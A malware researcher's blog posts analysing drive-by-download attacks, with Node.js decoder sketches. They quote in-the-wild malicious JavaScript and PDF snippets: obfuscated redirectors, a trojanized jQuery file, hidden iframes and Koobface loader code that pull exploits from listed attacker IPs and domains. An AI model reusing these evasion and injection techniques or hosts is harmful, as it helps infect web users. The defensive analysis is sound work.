April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
See you in Raleigh!
February 22, 2010
Another simple trick that is often used by malicious PDF files consists of embedding the malicious JavaScript code in a PDF stream hidden below several stream filters.
Here is an example:
4 0 obj
<<
/Length 2839
/Filter [ /ASCIIHexDecode
/LZWDecode
/ASCII85Decode
/RunLengthDecode
/FlateDecode ]
>>stream
80124E6422E89C7A3517958CC302316CDE
...
08220861102A8595D813C3187E07C40400>
endstream
endobj
The stream's contents are decoded by applying the five specified filters in
order (ASCIIHexDecode, LZWDecode, ASCII85Decode,
RunLengthDecode, and FlateDecode).
See this Wepawet report to find out what happens after the decoding is done. These malicious PDFs seem to also have decent detection on VirusTotal (6/41, at the time of writing).
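Here is a minimal Node.js sketch that shows the decoding order in practice by applying a /Filter array left to right. It is an illustration, not Wepawet's code. It assumes the raw stream bytes have already been extracted into a Buffer. It implements only three of the five filters in the example: ASCIIHexDecode, RunLengthDecode, and FlateDecode (the last one through Node's zlib module). LZWDecode and ASCII85Decode are omitted for brevity, and the function throws if it encounters them.

```javascript
const zlib = require("node:zlib");

// ASCIIHexDecode: hex digit pairs, whitespace ignored, ">" marks end of data;
// an odd final digit is treated as if it were followed by 0.
function asciiHexDecode(buf) {
  let hex = buf.toString("latin1").replace(/\s+/g, "");
  const end = hex.indexOf(">");
  if (end !== -1) hex = hex.slice(0, end);
  if (hex.length % 2 === 1) hex += "0";
  return Buffer.from(hex, "hex");
}

// RunLengthDecode: a length byte L in 0..127 copies the next L + 1 bytes,
// L in 129..255 repeats the next byte 257 - L times, and 128 ends the data.
function runLengthDecode(buf) {
  const out = [];
  let i = 0;
  while (i < buf.length) {
    const len = buf[i++];
    if (len === 128) break;
    if (len < 128) {
      for (let k = 0; k <= len && i < buf.length; k++) out.push(buf[i++]);
    } else {
      if (i >= buf.length) break;
      const b = buf[i++];
      for (let k = 0; k < 257 - len; k++) out.push(b);
    }
  }
  return Buffer.from(out);
}

// Only the filters implemented in this sketch; LZWDecode and
// ASCII85Decode are intentionally missing.
const DECODERS = {
  ASCIIHexDecode: asciiHexDecode,
  RunLengthDecode: runLengthDecode,
  FlateDecode: (buf) => zlib.inflateSync(buf),
};

// Decode stream data by applying the /Filter entries left to right.
function decodeStream(data, filters) {
  return filters.reduce((buf, name) => {
    const decode = DECODERS[name];
    if (!decode) throw new Error(`filter not supported in this sketch: ${name}`);
    return decode(buf);
  }, data);
}
```

For object 4 above, the call would be decodeStream(raw, ["ASCIIHexDecode", "LZWDecode", "ASCII85Decode", "RunLengthDecode", "FlateDecode"]). This sketch stops at the LZWDecode step until the two missing decoders are added.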
February 18, 2010
PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analysis of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
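var s = '';
// Build a function whose body is the decoded text, then run it.
new Function(decode(2, 35))();
function decode(page, xor){
// Number of words on the given (0-based) page.
var l = this.getPageNumWords(page);
for(var i = 0; i < l; i++){
var word = this.getPageNthWord(page, i);
// Last two characters of the word, read as a hex byte...
var c = word.substr(word.length - 2, 2);
var p = unescape("%" + c).charCodeAt(0);
// ...XORed with the key and appended to the output.
s += String.fromCharCode(p ^ xor);
}
return s;
}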
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that pages are 0-based in the PDF
API). It then loops through all the words in that page (via the
getPageNthWord function) and manipulates them. Let's see what the third
page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT begins a
text object and, conversely, ET ends it; 31.19 806.15 Td specifies the
position of the text on the page; and Tj is the text-showing operator.
The actual textual content is
the string starting with kh29.
We can now go back to our decode routine. It is clear that it extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as hex numbers (e.g., 0x29), xors them with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
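The same decoding can be reproduced outside Acrobat. In this Node.js illustration, a plain array of words takes the place of the getPageNumWords/getPageNthWord calls. The sketch also uses parseInt(c, 16) instead of unescape("%" + c).charCodeAt(0), which gives the same result whenever the last two characters are valid hex digits. The example words come from the page excerpt above.

```javascript
// Sketch: decode a getPageNthWord-style payload from a list of words.
// `words` stands in for getPageNthWord(page, 0 .. getPageNumWords(page) - 1).
function decodeWords(words, xor) {
  let s = "";
  for (const word of words) {
    // Last two characters of each word, read as a hex byte
    // (same result as unescape("%" + c).charCodeAt(0) for valid hex).
    const c = word.slice(-2);
    const p = parseInt(c, 16);
    // XOR with the key and append the resulting character.
    s += String.fromCharCode(p ^ xor);
  }
  return s;
}

// First three words of page 2 in the sample: they decode to "\n\tv".
console.log(JSON.stringify(decodeWords(["kh29", "kh2a", "kh55"], 35)));
```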
The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from which the malware is to be downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
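The body of encode_str is not shown above, so the following Node.js sketch only illustrates the general idea of a substitution decryption. It assumes that encode_str looks up each input character in its second argument and emits the character at the same position in its third argument. The tables below are hypothetical stand-ins, because the real src_table and dest_table are elided in the listing.

```javascript
// Sketch of a table-based substitution, in the spirit of
// encode_str(str, dest_table, src_table). Its exact behavior is an assumption.
function substitute(str, fromTable, toTable) {
  let out = "";
  for (const ch of str) {
    const idx = fromTable.indexOf(ch);
    // Characters missing from the table are copied unchanged (assumption).
    out += idx === -1 ? ch : toTable.charAt(idx);
  }
  return out;
}

// Hypothetical tables (the sample's real tables are elided).
const srcTable = "htp:/";
const destTable = "QWERT";

// The author field would hold the "encrypted" form of the URL.
const author = substitute("http://", srcTable, destTable);
console.log(author);                                    // QWWERTT
console.log(substitute(author, destTable, srcTable));   // http://
```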
Wepawet now handles this type of malicious PDF files. See this report for an example.
December 19, 2009
PDF exploits, mostly targeting Adobe Reader and Acrobat, are very commonly used on drive-by web sites. This situation is probably the result of the widespread use of the Adobe plugin, the rather large number of vulnerabilities found in it, and the availability of reliable exploitation techniques.
Two recent vulnerabilities for which I have added detection in Wepawet are CVE-2009-3459 and CVE-2009-4324 (click on the links to see analysis reports of two malicious samples). The former is an integer overflow in the PDF parser, the latter is a bug in the JavaScript interpreter.
The analysis of malicious PDF files is often complicated by the use of various obfuscation (or better, “confusion”) techniques. In particular, malicious PDF files are often malformed: expected sections are missing entirely, and others are truncated. The attacks still succeed because Adobe Reader does a good job of automatically repairing the damaged file. Of course, analysis tools are not necessarily as good at that.
I recently found an interesting, small trick that was used in the wild.
A little background first. A stream is a basic PDF object (technically, a
dictionary followed by a sequence of bytes) used to contain arbitrary content. In
particular, malicious PDFs use streams to contain the JavaScript code
used to launch an exploit. The Length entry in the stream dictionary
is used to specify, you guessed it, the length of the encoded content.
According to the PDF specification (Section 7.3.8.2 for the curious), the length
is to be specified as an integer. The sample I found, however,
used an expression (a sum) as the value of the Length entry:
obj
<</ / / / /Filter/ASCIIHexDecode/Length 100000+12488>>
stream
... stream contents ...
endstream
endobj
Lessons learned: do not trust specs and be a little lenient in the parsing of PDF files...
Update 1/7/2010: Richard B. pointed out that Acrobat seems to detect that the length specification is malformed, discards it, and falls back to a simple parsing strategy to extract the stream contents. Thanks!
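A lenient extractor in the spirit of this update might look like the following Node.js sketch. It trusts /Length only when the value is a plain integer that ends exactly at the endstream keyword. Otherwise, it falls back to scanning for endstream. This is an illustration, not Acrobat's actual algorithm. It assumes the object is available as a latin1 string, and it does not resolve indirect lengths such as 5 0 R (those simply take the fallback path).

```javascript
// Sketch: lenient extraction of a stream's raw bytes from one PDF object.
// Assumes the object is a latin1 string; indirect lengths ("5 0 R") are
// not resolved and simply take the fallback path.
function extractStreamData(objText) {
  // The stream keyword is followed by CRLF or LF.
  const kw = /stream\r?\n/.exec(objText);
  if (kw === null) throw new Error("no stream keyword");
  const start = kw.index + kw[0].length;

  // Strict path: /Length is a plain integer that lands right before endstream.
  const lenMatch = /\/Length\s+([^\/>]*)/.exec(objText.slice(0, kw.index));
  const token = lenMatch ? lenMatch[1].trim() : "";
  if (/^\d+$/.test(token)) {
    const end = start + Number(token);
    if (/^\s*endstream/.test(objText.slice(end))) {
      return { data: objText.slice(start, end), usedLength: true };
    }
  }

  // Lenient fallback: everything up to endstream, minus the preceding EOL.
  const stop = objText.indexOf("endstream", start);
  if (stop === -1) throw new Error("no endstream keyword");
  return { data: objText.slice(start, stop).replace(/\r?\n$/, ""), usedLength: false };
}

// A small object modeled on the sample, with a sum as its /Length.
const sample = "4 0 obj\n<</ / / / /Filter/ASCIIHexDecode/Length 100000+12488>>\n" +
  "stream\n616263>\nendstream\nendobj";
console.log(extractStreamData(sample));
```

With the 100000+12488 length, the strict path is skipped and the data is recovered by scanning for endstream.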
October 14, 2009
Writers of malicious JavaScript code have always been keen on developing novel ways to make the analysis of their code harder. One of the most commonly used mechanisms to do so is (no surprise here) simple obfuscation. For example, malware authors commonly encode string literals with custom schemes. A decoding routine then de-scrambles the strings before using them further (for example, as the URL of the next step of an attack or as the CLSID of a vulnerable ActiveX control).
Interestingly, malware authors have also introduced various techniques to make the basic deobfuscation step more difficult, in particular when it is performed off-line, for example, on pages saved during a crawling session.
One of the earliest tricks consists of using the URL of the obfuscated page as a decoding key in the deobfuscation routine. More recently, other techniques have also been used. One that I have seen lately uses the time of the page's last modification in the decoding routine.
Consider, for example, the following script:
<html><body><script>
var gtvwx=true,abwz="",gnru=false,
bfqrv=document.lastModified.split("/"),
dilp=String,
cjltu=bfqrv[2].split(":"),
acinqu=dilp['f#r(o#mZC#h#aZrZC(o,d#e('.replace(/[\(Z,G#]/g,'')],
gnty=bfqrv[0]+"25"+cjltu[2],
ckoxz=window,cklqry=0,klny="",
bfkw=ckoxz['euv9a2lS'.replace(/[S2u9@]/g,'')],
fopv=[150,173,160...90,94,111],
ailmux=function(){
for(var ehlt;cklqry<fopv.length;cklqry++){
klny+=acinqu(fopv[cklqry]-
gnty.substring(cklqry%gnty.length,cklqry%gnty.length+1).charCodeAt(0));
}
bfkw(klny);
};
ailmux();
</script></body></html>
The code reads the time the page was last modified from the
document.lastModified property. This property is initialized from the
value of the Last-Modified header sent by the web server serving the
page. The script then splits the resulting date string (in the format
MM/DD/YYYY HH:MM:SS) and extracts the month (bfqrv[0]) and the number of
seconds (cjltu[2]).
These values are then used to compute the decoding key gnty: the month,
followed by the constant string "25", followed by the seconds. The
decoding routine subtracts the character codes of the key, cyclically,
from the numbers in the encoded array fopv to recover the in-the-clear
text, which is finally passed to eval (bfkw).
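The key derivation and the decoding loop fit in a few lines of Node.js. This sketch follows the sample's logic but uses readable names. encodeWithKey is a hypothetical helper that only produces test data, because the real fopv array is elided above. The sketch also shows why off-line analysis fails: with a different timestamp the key changes and the output is garbage. The HTML specification has document.lastModified report the current time when no Last-Modified header is known, so replaying a saved page without the original header will likely produce a different key.

```javascript
// Sketch of the sample's key derivation: month + "25" + seconds,
// from a lastModified string in "MM/DD/YYYY HH:MM:SS" format.
function deriveKey(lastModified) {
  const dateParts = lastModified.split("/");   // ["MM", "DD", "YYYY HH:MM:SS"]
  const timeParts = dateParts[2].split(":");   // ["YYYY HH", "MM", "SS"]
  return dateParts[0] + "25" + timeParts[2];
}

// Same loop as ailmux(): subtract the key's character codes, cyclically.
function decodeWithKey(codes, key) {
  let out = "";
  for (let i = 0; i < codes.length; i++) {
    out += String.fromCharCode(codes[i] - key.charCodeAt(i % key.length));
  }
  return out;
}

// Hypothetical inverse, used only to build example data.
function encodeWithKey(text, key) {
  return Array.from(text, (ch, i) => ch.charCodeAt(0) + key.charCodeAt(i % key.length));
}

const key = deriveKey("09/25/2009 10:20:33");   // "092533"
const codes = encodeWithKey("alert(1)", key);
console.log(decodeWithKey(codes, key));           // alert(1)
// One second off: a different key, so the text no longer decodes.
console.log(decodeWithKey(codes, deriveKey("09/25/2009 10:20:34")) === "alert(1)"); // false
```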
These are the Wepawet reports for a couple of sites that use this technique: report for hxxp://www.pipisechka.com/sleep/news.php and report for hxxp://day-evryday.cn/news.php
October 10, 2009
A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.
A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.
A malicious page contains a script tag similar to the following:
<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>
The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:
Some of these domains appear to be selling various items (cell phone,
drugs). However, others (at least afsharteam1.com) launch
drive-by-download attacks. As a result, a malware sample with limited and
generic detection on
VirusTotal gets downloaded and launched on the
victim's machine.
For more details, see the Wepawet report for
bertilladingman36429.blogspot.com,
a blog that redirects to drive-by attacks.
October 8, 2009
Here is another exploit toolkit that has been making the rounds
recently: the Liberty exploit pack. Most notably, in mid-September,
Liberty was used in a drive-by-download campaign that injected iframes
pointing at searra-ditol.cn and embrari-1.cn into a large number of
vulnerable web sites.
A couple of pages from the toolkit admin panel:
Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.
October 4, 2009
Here is an old trick for foiling manual and automated analysis of malicious pages that I still see from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Normally, this status code indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correct the error. With malicious pages that use this trick, however, the body of the apparently missing page contains code that attempts to exploit browser vulnerabilities or to redirect to other malicious web sites.
The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:
HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html
<iframe src="http://213.163.89.54/lib/index.php"
width=0 height=0
style="hidden"
frameborder=0 marginheight=0 marginwidth=0
scrolling=no>
</iframe>
The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 error code would not reveal any wrongdoing. A complete analysis (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection, malicious PDF and Flash files are delivered to the visitor's browser.
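The lesson for analysis tools is to inspect the body even when the status code says the page does not exist. Below is a rough Node.js sketch of such a status-agnostic check. It flags iframes whose width or height is 0. It uses regular expressions instead of a real HTML parser, which is a deliberate simplification that a determined attacker could evade. findIframes is an illustrative name, not part of any tool mentioned here.

```javascript
// Sketch: list iframes in an HTTP response body, whatever the status code.
// Regex-based, so it only handles simple, well-formed attributes.
function findIframes(body) {
  const results = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(body)) !== null) {
    const attrs = m[1];
    // Value of a single attribute, quoted or unquoted (null if absent).
    const attr = (name) => {
      const a = new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, "i").exec(attrs);
      return a ? a[1] : null;
    };
    const width = attr("width");
    const height = attr("height");
    results.push({ src: attr("src"), invisible: width === "0" || height === "0" });
  }
  return results;
}
```

For the body of the 404 response above, it reports a single invisible iframe pointing at http://213.163.89.54/lib/index.php.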
September 29, 2009
Long time, no write... but I thought this could be a good occasion to start again.
It looks like the Koobface people have been busy updating their social engineering tricks. But let's start from the beginning. I was inspecting fnplbpnbvxqjrey.blogspot.com, a BlogSpot blog that Wepawet flagged as suspicious and as involved in pushing Koobface (see the Wepawet report for fnplbpnbvxqjrey.blogspot.com). At first sight, the blog appears to be just one of the many BlogSpot pages involved in this activity.
However, a closer look at the source code of the page reveals something interesting. The code responsible for actually redirecting to Koobface is a fairly recent variant (I have seen it used as early as 2009-09-12). Here is a slightly simplified listing of this code:
var ogxbjeqrihscndvz6 = [ /* list of server IPs */ ];
var mzvtonlxsjprcb5 = '';
cvuhxdinmlqjoeft1();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
n = parseInt(location.href.substr(n + 4));
if (n < 101)
js = '/cnet';
else if (n < 201)
js = '/warn';
else if (n < 301)
js = '/scan';
else if (n < 401)
js = '';
}
for (var onwxklrqhybjvpase3 = 0;
onwxklrqhybjvpase3 < ogxbjeqrihscndvz6.length;
onwxklrqhybjvpase3 ++) {
var ypcovhrtbmn8 = document.createElement('script');
ypcovhrtbmn8.type = 'text/javascript';
ypcovhrtbmn8.src = 'http://' + ogxbjeqrihscndvz6[onwxklrqhybjvpase3] +
'/go' + '.js' + '?0x3' + 'E8' + mzvtonlxsjprcb5 + js + '/' +
(location.search.length > 0 ? location.search : '');
document.getElementsByTagName('head')[0].appendChild(ypcovhrtbmn8);
}
The script loops over an array that holds the IPs of compromised
machines to which visitors of the malicious blog will be redirected. For
each IP, an HTML script tag is added to the page. The tag is set to
point to a URL on the compromised IP. Depending on the value of the id
parameter in the blog's URL, the path of the URL will contain one of the
following strings: /view (the default), /cnet, /warn, or /scan; ids
between 301 and 400 add no extra path component.
When the redirection is finally triggered, the victim is presented with a
different page, depending on which of these strings was included
in the URL.
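The branch logic that picks the path component is easy to reproduce. This Node.js sketch takes the blog URL and returns the string that the sample stores in js. The name selectPath is illustrative and does not appear in the sample. The sketch uses slice and an explicit radix instead of substr and a radix-less parseInt, which behave the same for ordinary decimal ids. The example.blogspot.com URLs are placeholders.

```javascript
// Sketch of the sample's path selection, keyed on the ?id= parameter.
function selectPath(href) {
  let js = "/view";                          // default: no ?id= in the URL
  const n = href.indexOf("?id=");
  if (n !== -1) {
    const id = parseInt(href.slice(n + 4), 10);
    if (id < 101) js = "/cnet";
    else if (id < 201) js = "/warn";
    else if (id < 301) js = "/scan";
    else if (id < 401) js = "";              // no extra path component
    // id >= 401, or a non-numeric id (NaN), keeps "/view"
  }
  return js;
}

for (const id of [50, 150, 250, 350, 450]) {
  console.log(id, JSON.stringify(selectPath(`http://example.blogspot.com/?id=${id}`)));
}
```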
All the pages attempt to social engineer visitors into downloading and installing the Koobface malware. Here are screenshots that show the tricks they use:
[Screenshots of the /view, /cnet, /scan, and /warn pages]
Just a few more aces up Koobface's sleeve...
May 6, 2009
An anti-analysis/fingerprinting trick I've noticed more and more frequently in drive-by downloads is the use of IE conditional compilation.
Conditional compilation is a feature of Internet Explorer that enables the browser to control the compilation of a script (that is, to include or exclude code to be interpreted) depending on the values of a number of conditional compilation variables. Predefined variables provide information about the client environment, such as its processor, OS, and JavaScript version. Conditional compilation statements are typically contained in regular JavaScript comments to prevent problems with browsers that do not support this feature.
Here is an example of how conditional compilation is used in drive-by downloads:
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
"/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
The cc_on statement enables conditional compilation. The @if
statement checks that the browser is running on a Win32 system. If this
is the case, then the following JavaScript block is interpreted,
otherwise it is simply ignored. The code block is a
classic deobfuscation routine that produces the following text:
<script type="text/javascript"
src="http://95.129.144.229/stats/stats.js"></script>
This script tag fetches a script that redirects to a number of pages serving
exploits.
What happens if the user's browser does not support conditional compilation, for example, because it is an analysis tool based on the stock SpiderMonkey or Rhino engines? Then it will simply treat the entire conditional compilation section as a comment and skip it. As a consequence, the malicious script tag will not be added to the page, the subsequent exploits will not be launched, and the analysis tool will not detect them.
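Both halves of the trick can be checked in Node.js. Its V8 engine, like SpiderMonkey and Rhino, does not support conditional compilation. The sketch below reproduces the shift-by-one decoder from the sample. It also shows that a non-IE engine treats an @if ... @end section as nothing more than a block comment. The ccRan flag is a hypothetical marker that is not part of the sample.

```javascript
// The sample's decoder: subtract `shift` from every character code.
function shiftDecode(source, shift) {
  let result = "";
  for (let i = 0; i < source.length; i++) {
    result += String.fromCharCode(source.charCodeAt(i) - shift);
  }
  return result;
}

const source = "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
  "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
console.log(shiftDecode(source, 1));

// In V8 the conditional section below is a plain block comment, so the
// assignment never runs and ccRan stays undefined.
const ccBlock = "/*@cc_on @*/ /*@if (@_win32) globalThis.ccRan = true; /*@end @*/";
new Function(ccBlock)();
console.log(globalThis.ccRan); // undefined
```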
The full report for the example is available on Wepawet.
May 1, 2009
Malicious JavaScript code often relies on defensive mechanisms to evade detection or to make its deobfuscation more difficult. Some of these methods have been well discussed (see, for example, the very nice presentations Reverse Engineering Malicious Javascript by J. Nazario and Circumventing Automated JavaScript Analysis by B. Hoffman), but it's interesting to see how they are used.
Some of the earliest defensive techniques are directed against the
manual analysis of malicious code. For example, a quick analysis
technique consists of wrapping the script's code into textarea tags so
that deobfuscated code is written into the textarea and can be
quickly inspected and copy-and-pasted for further analysis. In this
case, the textarea is essentially used as a poor man's sandbox. Something
the bad guys figured out quickly was that all they needed to do to
defeat this technique was to close the textarea tag before performing
any other action.
Somewhat surprisingly, this trick is still used from time to time. A few months ago, a malicious script on ixfree.net contained the following code:
document.write("</textarea>");
var i, _, a = ["78.110.175.21", "195.24.76.251"];
_ = 1;
if (document.cookie.match(/\bhgft=1/) == null)
for (i = 0; i < 2; i++)
document.write("<script>if(_)" +
"document.write(\"<script id=_" + i + "_ src=//" + a[i] +
"/cp/?" + navigator.appName.charAt(0) +
"><\\/script>\")<\/script>");
(see full report on Wepawet)
The code closes the textarea to escape its "sandbox", checks that a cookie is not set, and then generates two script tags that redirect to exploits. If you were to wrap this code into a textarea, you would end up with an empty textarea and might wrongly conclude that the script is benign.
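A sturdier version of the same idea records what the script writes instead of letting a textarea render it. With this approach, a closing tag is just another string. The following Node.js sketch is an illustration of the approach, not Wepawet's implementation. captureWrites is a hypothetical helper that runs a script with stub document and navigator objects. Note that new Function is not a sandbox, because the code can still reach Node's globals. Use it only for controlled experiments.

```javascript
// Sketch: run a script against stub objects and collect its document.write output.
// WARNING: new Function is not a security boundary; the script can still
// access Node's globals.
function captureWrites(code, { cookie = "", appName = "Netscape" } = {}) {
  const written = [];
  const documentStub = {
    cookie,
    write(html) { written.push(String(html)); },
  };
  const navigatorStub = { appName };
  // The script sees the stubs as its `document` and `navigator` variables.
  new Function("document", "navigator", code)(documentStub, navigatorStub);
  return written;
}

const demo = 'document.write("</textarea>"); document.write("<b>" + navigator.appName + "</b>");';
console.log(JSON.stringify(captureWrites(demo))); // ["</textarea>","<b>Netscape</b>"]
```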
April 26, 2009
A social engineering trick that the people behind drive-by downloads are using is to hide their malicious code in the middle of benign, well-known code.
For example, a number of compromised web sites have recently found their pages modified with iframes pointing at hxxp://94.247.2.195/jquery.js. At a cursory inspection, jquery.js looks like the jQuery library, a well-known (and definitely benign) JavaScript library. The code includes jQuery's standard copyright notice and revision information, and the first 6K bytes or so are indeed identical to the original library's code.
/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/
(function(){var l=this,g,y=l.jQu...
However, the malicious code is hidden toward the end of the script, where one finds:
if( (typeof(jquery_data)!=typeof(1)) &&
(document.cookie.match(/\miek=1/)==null))
document.write(
unescape('fq%3CssoWcOTHriDpgpsoWt...FH5rscDpgrRpiptRp%3E')
.replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"")
.replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));
jquery_data=1;
This code determines whether an attack has already been launched by
checking the jquery_data variable and the miek cookie. If not, it
deobfuscates a long string and writes it in the current page. The
deobfuscated string creates a new script tag that points at
hxxp://94.247.2.195/news/?id=, where the value of the id parameter
is 100 if the browser's name (navigator.appName) starts with the letter M
(as Internet Explorer's "Microsoft Internet Explorer" does) and 101 in all
other cases (e.g., Firefox, which reports "Netscape"). This
page, in turn, attempts to launch a number of exploits (see the Wepawet
report).
The exploits target vulnerabilities in MDAC, PDF, and SWF.
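The string transformation can be replayed on the fragments that are visible in the listing. In this Node.js sketch, deobfuscate applies the same replace chain as the sample and relies on the legacy global unescape, which Node still provides. The full encoded string is elided above. For that reason, the example uses only its visible prefix plus a hypothetical fragment that contains the Z placeholder.

```javascript
// Sketch of the sample's deobfuscation chain: URL-unescape, strip junk
// tokens, then replace the first "Z" with a browser-dependent digit.
function deobfuscate(encoded, appName) {
  return unescape(encoded)
    .replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g, "")
    .replace(/Z/, appName.charAt(0) === "M" ? "0" : "1");
}

// Visible prefix of the encoded string from the sample.
console.log(deobfuscate("fq%3CssoWcOTHriDpgpsoWt", "Netscape")); // <script

// Hypothetical fragment showing the Z placeholder.
console.log(deobfuscate("?id=10Z", "Microsoft Internet Explorer")); // ?id=100
console.log(deobfuscate("?id=10Z", "Netscape"));                    // ?id=101
```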
It's certainly true: things are not always what they seem...